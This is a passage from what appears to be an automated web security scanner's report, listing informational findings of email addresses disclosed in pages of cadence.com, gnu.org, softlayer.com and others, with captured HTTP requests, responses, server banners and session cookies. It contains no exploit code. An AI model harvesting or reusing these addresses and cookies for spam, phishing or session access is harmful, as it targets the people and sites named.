if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...
=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"
+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"
+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id
...[SNIP]...
16.4. http://www.cadence.com/_layouts/_cadenceomniture/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cadence.com
Path:   /_layouts/_cadenceomniture/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /_layouts/_cadenceomniture/s_code.js HTTP/1.1
Host: www.cadence.com
Proxy-Connection: keep-alive
Referer: http://www.cadence.com/us/pages/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600, no-check
Content-Length: 29310
Content-Type: application/x-javascript
Content-Location: http://www.cadence.com/_layouts/_cadenceomniture/s_code.js
Last-Modified: Wed, 18 Aug 2010 21:44:38 GMT
Accept-Ranges: bytes
ETag: "0a7598e1e3fcb1:2a8"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 07 Jul 2011 00:00:25 GMT

/* SiteCatalyst code version: H.15.1
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/***************************** REVISIONS *****************************/
/*
...[SNIP]...
`i+s.hav()+q+(qs?qs:s.rq(^C)),0,id,ta);qs`h;`Wm('t')`5s.p"
+"_r)s.p_r()}^7(qs);^y`o(@g;`k@g`L^9,`F$51',vb`R@G=^D=s.`N`g=s.`N^K=`E^z^x=s.ppu=^n=^nv1=^nv2=^nv3`h`5$t)`E^z@G=`E^zeo=`E^z`N`g=`E^z`N^K`h`5!id@Us.tc){s.tc=1;s.flush`Z()}`2$h`Atl`0o,t,n,vo`1;s.@G=@uo"
+"`R`N^K=t;s.`N`g=n;s.t(@g}`5pg){`E^zco`0o){`K@J\"_\",1,#8`2@uo)`Awd^zgs`0$P{`K@J$k1,#8`2s.t()`Awd^zdc`0$P{`K@J$k#8`2s.t()}}@2=(`E`I`X`8`4@ss@b0`Rd=
...[SNIP]...
16.5. http://www.fark.com/cgi/farkit.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fark.com
Path:   /cgi/farkit.pl

Issue detail

The following email address was disclosed in the response:

Request

GET /cgi/farkit.pl HTTP/1.1
Host: www.fark.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:07:35 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Server: Apache
P3P: CP="CAO PSA OUR"
Set-Cookie: FarkUser=v7aH50e9gtrYYySpXPTIo-nBHGZ9nVB94SwKRg1VwhFj-9-YQL5BzG0ppgaq3-8tel444UtsZSFScvB7a-XxADQaRnWCK; Domain=.fark.com; Expires=Sat, 30-Jun-2012 14:07:35 GMT; Max-Age=31104000; Path=/; Version=1; HttpOnly
Expires: Wed, 06 Jul 2011 14:07:35 GMT
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache, must-revalidate
Content-Length: 36547

<!doctype html>
<!-- paulirish.com/2008/conditional-stylesheets-vs-css-hacks-answer-neither/ -->
<!--[if lt IE 7 ]> <html class="no-js ie6" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-j
...[SNIP]...
<a target="_blank" rel="nofollow" href="http://chat.mibbit.com/#fark@irc.fdfnet.net">
...[SNIP]...
16.6. http://www.gnu.org/licenses/gpl.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gnu.org
Path:   /licenses/gpl.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /licenses/gpl.html HTTP/1.1
Host: www.gnu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:22 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:21:22 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 50022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http
...[SNIP]...
<link rev="made" href="mailto:webmasters@gnu.org" />
...[SNIP]...
<input type="text" id="frmEmail" name="email-Primary" size="15" maxlength="80" value="you@example.com" onfocus="this.value=''" />
...[SNIP]...
<a href="mailto:gnu@gnu.org"><em>gnu@gnu.org</em>
...[SNIP]...
<a href="mailto:webmasters@gnu.org"><em>webmasters@gnu.org</em>
...[SNIP]...
<!-- advise web-translators@gnu.org and add it to -->
...[SNIP]...
16.7. http://www.masshightech.com/tech-news-widget/widget.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.masshightech.com
Path:   /tech-news-widget/widget.js

Issue detail

The following email address was disclosed in the response:

Request

GET /tech-news-widget/widget.js HTTP/1.1
Host: www.masshightech.com
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:00:24 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 24 Jun 2009 16:00:16 GMT
Accept-Ranges: bytes
Cteonnt-Length: 8381
Connection: close
Content-Type: application/x-javascript
Set-Cookie: NSC_xxx.nbttijhiufdi.dpn-wtfsw=e243cf7e3660;expires=Wed, 06-Jul-11 14:12:33 GMT;path=/
Cache-Control: private
Content-Length: 8381

/**
* Mass High Tech Widget
* version 1.2
*
* Copyright (c) 2009, All Rights Reserved Worldwide
*
* author Fred LeBlanc <fred@suredev.com> of SureDev via Boston Web Studio
* created for
...[SNIP]...
16.8. http://www.mixx.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mixx.com
Path:   /submit

Issue detail

The following email address was disclosed in the response:

Request

GET /submit HTTP/1.1
Host: www.mixx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Wed, 06 Jul 2011 11:19:48 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k DAV/2 Phusion_Passenger/3.0.1
Status: 500 Internal Server Error
Vary: Accept-Encoding
Content-Length: 669
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
<p>Please contact the server administrator,
nathaniel@mixx.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...
16.9. http://www.opensource.org/licenses/gpl-license.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/gpl-license.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:05:58 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.19 OpenSSL/0.9.8n DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=hgig1lfiopk95ql3u4pi3mr831; expires=Fri, 29-Jul-2011 17:39:18 GMT; path=/; domain=.opensource.org
Last-Modified: Wed, 06 Jul 2011 14:02:03 GMT
ETag: "1a6140a90b059f012afb34dbb1337aac"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 7275
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="mailto:osi@opensource.org">
...[SNIP]...
<a href="mailto:webmaster@opensource.org">
...[SNIP]...
16.10. http://www.opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:12 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.19 OpenSSL/0.9.8n DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=nckibgvdkif5pk4ruq9eiask34; expires=Fri, 29-Jul-2011 15:10:32 GMT; path=/; domain=.opensource.org
Last-Modified: Wed, 06 Jul 2011 11:32:17 GMT
ETag: "88cb710a049c0b384cfdb46952931378"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="mailto:osi@opensource.org">
...[SNIP]...
<a href="mailto:webmaster@opensource.org">
...[SNIP]...
16.11. http://www.sipc.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sipc.org
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.sipc.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 13:57:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>SIPC - Securities Investor Protection Corporation</title>
<meta http-equiv="Content-Type" content="
...[SNIP]...
<a href="mailto:kphillips@hastingsgroup.com">
...[SNIP]...
16.12. http://www.sipc.org/members/sipclogo.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sipc.org
Path:   /members/sipclogo.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /members/sipclogo.cfm HTTP/1.1
Host: www.sipc.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 13:57:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="keyw
...[SNIP]...
<a href="mailto:kphillips@hastingsgroup.com">
...[SNIP]...
16.13. http://www.softlayer.com/about/analyst-relations/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /about/analyst-relations/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about/analyst-relations/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:17 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:17 GMT
Connection: close
Content-Type: text/html
Content-Length: 22617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...
<a
href="mailto:mquigley@softlayer.com">mquigley@softlayer.com</a>
...[SNIP]...
16.14. http://www.softlayer.com/about/careers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /about/careers/

Issue detail

The following email address was disclosed in the response:

Request

GET /about/careers/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:17 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:17 GMT
Connection: close
Content-Type: text/html
Content-Length: 21288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...
16.15. http://www.softlayer.com/about/contact-us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /about/contact-us/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about/contact-us/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:16 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:16 GMT
Connection: close
Content-Type: text/html
Content-Length: 26084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...
<a
href="mailto:support@softlayer.com">support@softlayer.com</a>
...[SNIP]...
<a
href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...
<a
href="mailto:press@softlayer.com">press@softlayer.com</a>
...[SNIP]...
<a
href="mailto:accounting@softlayer.com">accounting@softlayer.com</a>
...[SNIP]...
<a
href="mailto:resumes@softlayer.com">resumes@softlayer.com</a>
...[SNIP]...
16.16. http://www.softlayer.com/about/feedback  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /about/feedback

Issue detail

The following email address was disclosed in the response:

Request

GET /about/feedback HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:18 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:18 GMT
Connection: close
Content-Type: text/html
Content-Length: 21557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...
16.17. http://www.softlayer.com/cloudlayer/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /cloudlayer/

Issue detail

The following email address was disclosed in the response:

Request

GET /cloudlayer/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:25 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:25 GMT
Connection: close
Content-Type: text/html
Content-Length: 23260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...
16.18. http://www.softlayer.com/dedicated/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /dedicated/

Issue detail

The following email address was disclosed in the response:

Request

GET /dedicated/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:23 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:23 GMT
Connection: close
Content-Type: text/html
Content-Length: 104124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
16.19. http://www.softlayer.com/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /index.html HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:22 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:22 GMT
Connection: close
Content-Type: text/html
Content-Length: 29867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...
16.20. http://www.softlayer.com/legal/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /legal/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /legal/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:20 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:20 GMT
Connection: close
Content-Type: text/html
Content-Length: 21961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...
<a
href="mailto:legal@softlayer.com">legal@softlayer.com</a>
...[SNIP]...
<a
href="mailto:copyright@softlayer.com">copyright@softlayer.com</a>
...[SNIP]...
<a
href="mailto:abuse@softlayer.com">abuse@softlayer.com</a>
...[SNIP]...
<a
href="mailto:subpoenas@softlayer.com">subpoenas@softlayer.com</a>
...[SNIP]...
16.21. http://www.softlayer.com/partners/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /partners/

Issue detail

The following email address was disclosed in the response:

Request

GET /partners/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:27 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:27 GMT
Connection: close
Content-Type: text/html
Content-Length: 40276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="ht
...[SNIP]...
<a href="mailto:sales@softlayer.com">
...[SNIP]...
<a href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...
16.22. http://www.softlayer.com/press  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /press

Issue detail

The following email address was disclosed in the response:

Request

GET /press HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:28 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:28 GMT
Connection: close
Content-Type: text/html
Content-Length: 76287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...
16.23. http://www.softlayer.com/resources/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /resources/

Issue detail

The following email address was disclosed in the response:

Request

GET /resources/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:22 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:22 GMT
Connection: close
Content-Type: text/html
Content-Length: 23896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...
16.24. http://www.softlayer.com/resources/mobile-apps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /resources/mobile-apps/

Issue detail

The following email address was disclosed in the response:

Request

GET /resources/mobile-apps/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:21 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:21 GMT
Connection: close
Content-Type: text/html
Content-Length: 24909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...
16.25. http://www.softlayer.com/sitemap/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /sitemap/

Issue detail

The following email address was disclosed in the response:

Request

GET /sitemap/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:29 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:29 GMT
Connection: close
Content-Type: text/html
Content-Length: 27263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...
16.26. http://www.softlayer.com/solutions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /solutions/

Issue detail

The following email address was disclosed in the response:

Request

GET /solutions/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:26 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:26 GMT
Connection: close
Content-Type: text/html
Content-Length: 24742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...
16.27. http://www.softlayer.com/specials/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /specials/

Issue detail

The following email address was disclosed in the response:

Request

GET /specials/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:29 GMT
Server: Apache
